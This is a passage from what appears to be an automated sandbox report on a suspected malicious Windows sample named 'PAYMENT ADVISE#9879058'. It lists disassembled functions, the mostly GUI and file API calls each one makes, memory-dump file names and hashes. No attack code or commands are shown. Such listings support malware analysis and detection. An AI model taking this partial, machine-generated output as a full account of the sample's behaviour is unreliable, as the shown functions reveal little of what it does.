                          • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                          • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                          • GetCursorInfo.USER32 ref: 00458E03
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Cursor$Load$Info
                          • String ID:
                          • API String ID: 2577412497-0
                          • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                          • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                          • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                          • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                          Function 00469681 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 253windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                          • GetFocus.USER32 ref: 004696E0
                          • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessagePost$CtrlFocus
                          • String ID: 0
                          • API String ID: 1534620443-4108050209
                          • Opcode ID: e5c32c991b5ca6252707de8ebf482154a45a931f584edf505bd4e03ae59cba12
                          • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                          • Opcode Fuzzy Hash: e5c32c991b5ca6252707de8ebf482154a45a931f584edf505bd4e03ae59cba12
                          • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                          Function 004680EB Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 204windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00468107
                          • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                          • GetMenuItemCount.USER32(?), ref: 00468227
                          • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                          • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                          • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                          • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                          • GetMenuItemCount.USER32 ref: 004682DC
                          • SetMenuItemInfoW.USER32 ref: 00468317
                          • GetCursorPos.USER32(00000000), ref: 00468322
                          • SetForegroundWindow.USER32(?), ref: 0046832D
                          • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                          • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                          • String ID: 0
                          • API String ID: 3993528054-4108050209
                          • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                          • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                          • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                          • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                          Function 0046F2B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185windowfileCOMMON
                          Download Yara Rule
                          APIs
                          • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                            • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                            • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                            • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                          • SendMessageW.USER32(?), ref: 0046F34C
                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                          • _wcscat.LIBCMT ref: 0046F3BC
                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                          • DragFinish.SHELL32(?), ref: 0046F414
                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                          • API String ID: 4085615965-3440237614
                          • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                          • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                          • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                          • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                          Function 0044B988 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __wcsicoll
                          • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                          • API String ID: 3832890014-4202584635
                          • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                          • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                          • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                          • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                          Function 00466999 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 312COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 004669C4
                          • _wcsncpy.LIBCMT ref: 00466A21
                          • _wcsncpy.LIBCMT ref: 00466A4D
                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                          • _wcstok.LIBCMT ref: 00466A90
                            • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                          • _wcstok.LIBCMT ref: 00466B3F
                          • _wcscpy.LIBCMT ref: 00466BC8
                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                          • _wcslen.LIBCMT ref: 00466D1D
                          • _memset.LIBCMT ref: 00466BEE
                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                          • _wcslen.LIBCMT ref: 00466D4B
                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                          • String ID: X$HH
                          • API String ID: 3021350936-1944015008
                          • Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                          • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                          • Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                          • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                          Function 0045F48E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 226windowsleepCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0045F4AE
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                          • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                          • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: InfoItemMenu$Sleep_memset
                          • String ID: 0
                          • API String ID: 1504565804-4108050209
                          • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                          • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                          • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                          • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                          Function 004556F8 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 216COMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Window$CreateDestroy
                          • String ID: ,$tooltips_class32
                          • API String ID: 1109047481-3856767331
                          • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                          • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                          • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                          • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                          Function 0045CBCC Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202COMMON
                          Download Yara Rule
                          APIs
                          • _wcsncpy.LIBCMT ref: 0045CCFA
                          • __wsplitpath.LIBCMT ref: 0045CD3C
                          • _wcscat.LIBCMT ref: 0045CD51
                          • _wcscat.LIBCMT ref: 0045CD63
                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                            • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                          • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                          • _wcscpy.LIBCMT ref: 0045CE14
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                          • String ID: *.*
                          • API String ID: 1153243558-438819550
                          • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                          • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                          • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                          • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                          Function 0045510D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 115windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00455127
                          • GetMenuItemInfoW.USER32 ref: 00455146
                          • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                          • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                          • GetMenuItemCount.USER32(?), ref: 004551D9
                          • SetMenu.USER32(?,00000000), ref: 004551E7
                          • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                          • DrawMenuBar.USER32 ref: 00455207
                          • DeleteObject.GDI32(?), ref: 0045564E
                          • DeleteObject.GDI32(?), ref: 0045565C
                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                          • String ID: 0
                          • API String ID: 1663942905-4108050209
                          • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                          • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                          • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                          • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                          Function 00415C25 Relevance: 22.7, APIs: 15, Instructions: 236COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                          • String ID:
                          • API String ID: 1481289235-0
                          • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                          • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                          • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                          • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                          Function 0046FB53 Relevance: 22.7, APIs: 15, Instructions: 176windowCOMMON
                          Download Yara Rule
                          APIs
                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                          • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                          • SendMessageW.USER32 ref: 0046FBAF
                          • SendMessageW.USER32 ref: 0046FBE2
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                          • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                          • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                          • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                          • SendMessageW.USER32 ref: 0046FD00
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: MessageSend$IconImageList_$CreateExtractReplace
                          • String ID:
                          • API String ID: 2632138820-0
                          • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                          • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                          • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                          • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                          Function 00433BAC Relevance: 22.6, APIs: 15, Instructions: 79COMMON
                          Download Yara Rule
                          APIs
                          • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                          • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                          • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                          • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                          • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                          • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                          • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                          • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                          • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                          • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                          • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                          • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CursorLoad
                          • String ID:
                          • API String ID: 3238433803-0
                          • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                          • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                          • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                          • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                          Function 00460ABB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                          • _wcslen.LIBCMT ref: 00460B00
                          • __swprintf.LIBCMT ref: 00460B9E
                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                          • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                          • GetDlgCtrlID.USER32(?), ref: 00460CE6
                          • GetWindowRect.USER32(?,?), ref: 00460D21
                          • GetParent.USER32(?), ref: 00460D40
                          • ScreenToClient.USER32(00000000), ref: 00460D47
                          • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                          • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                          • String ID: %s%u
                          • API String ID: 1899580136-679674701
                          • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                          • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                          • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                          • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                          Function 0047D5F6 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 210COMMON
                          Download Yara Rule
                          APIs
                          • CoTaskMemFree.OLE32(?), ref: 0047D6D3
